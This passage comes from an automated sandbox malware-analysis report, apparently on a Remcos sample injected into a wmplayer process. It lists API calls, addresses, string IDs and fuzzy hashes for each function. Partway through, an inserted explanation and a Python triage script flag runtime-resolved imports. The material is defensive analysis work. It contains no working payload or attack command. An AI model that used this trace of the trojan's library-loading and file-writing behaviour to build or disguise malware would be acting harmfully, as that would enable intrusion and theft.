                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                            • free.MSVCRT ref: 0041747F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2678498856-0
                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Item
                                                                                            • String ID:
                                                                                            • API String ID: 3888421826-0
                                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00417B7B
                                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3727323765-0
                                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                            APIs
                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 764393265-0
                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                            • String ID:
                                                                                            • API String ID: 979780441-0
                                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                            • String ID:
                                                                                            • API String ID: 1386444988-0
                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcschr$memcpywcslen
                                                                                            • String ID: "
                                                                                            • API String ID: 1983396471-123907689
                                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                            APIs
                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemcpy
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2789212964-323797159
                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf
                                                                                            • String ID: %%-%d.%ds
                                                                                            • API String ID: 3988819677-2008345750
                                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendmemset
                                                                                            • String ID: F^@
                                                                                            • API String ID: 568519121-3652327722
                                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PlacementWindowmemset
                                                                                            • String ID: WinPos
                                                                                            • API String ID: 4036792311-2823255486
                                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                            • API String ID: 2773794195-880857682
                                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
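The entry above (GetSystemDirectoryW, wcscpy/wcscat, LoadLibraryW, then GetProcAddress for SHGetSpecialFolderPathW, with shell32.dll among the strings) is the usual runtime-import pattern; the report lists the calls but does not pull the pattern out across entries. The following is an added example, not code from the Joe Sandbox report or from the Remcos sample: a small Python parser for these IDA-plugin function entries that extracts the API sequence per function and flags exports resolved by name through GetProcAddress. The entry layout it assumes (a bare `APIs` line opening each function, `•` bullets, an optional `Part of subcall function ADDR:` prefix, `(args), ref: ADDR` suffixes) is taken from what is shown on this page; the sample input is an excerpt of two entries above with the indentation trimmed.

```python
"""Parse Joe Sandbox IDA-plugin function entries (as listed in this report)
and flag functions that resolve imports at runtime via GetProcAddress."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API bullet: "• name.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:". Args and ref are optional in the report.
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?\s*$"
)
# Metadata bullets worth keeping from the "Similarity" part of each entry.
_FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash):"
    r"\s*(?P<val>.*?)\s*$"
)
_HEX8_RE = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: Optional[str]
    subcall: Optional[str]  # set when the call happens inside a callee


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the report text into entries; each starts at a bare 'APIs' line."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = _FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            continue
        m = _API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return entries


def dynamic_imports(entry: FunctionEntry) -> List[str]:
    """Export names passed to GetProcAddress as a literal (not '?' and not a
    raw 8-hex-digit value), i.e. imports the sample resolves at runtime."""
    found = []
    for call in entry.apis:
        if call.name == "GetProcAddress" and len(call.args) >= 2:
            target = call.args[1]
            if target != "?" and not _HEX8_RE.match(target):
                found.append(target)
    return found


def triage(text: str) -> List[dict]:
    """One summary dict per entry: what it calls and what it resolves by name."""
    out = []
    for e in parse_entries(text):
        out.append({
            "opcode_id": e.fields.get("Opcode ID", "")[:16],
            "api_sequence": [c.name for c in e.apis],
            "loads_library": any(c.name.startswith("LoadLibrary") for c in e.apis),
            "dynamic_imports": dynamic_imports(e),
            "strings": e.fields.get("String ID", ""),
        })
    return out


# Constructed sample: an excerpt of two entries from this report, indentation trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Memory Dump Source
• Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run against the full text of this section, `triage` gives one row per function entry; rows with a non-empty `dynamic_imports` list, together with `loads_library`, are the ones worth opening first, since a name passed to GetProcAddress is the import the sample deliberately kept out of its import table.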
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                            APIs
                                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040A908
                                                                                            • free.MSVCRT ref: 0040A92B
                                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                            • free.MSVCRT ref: 0040B201
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B224
                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
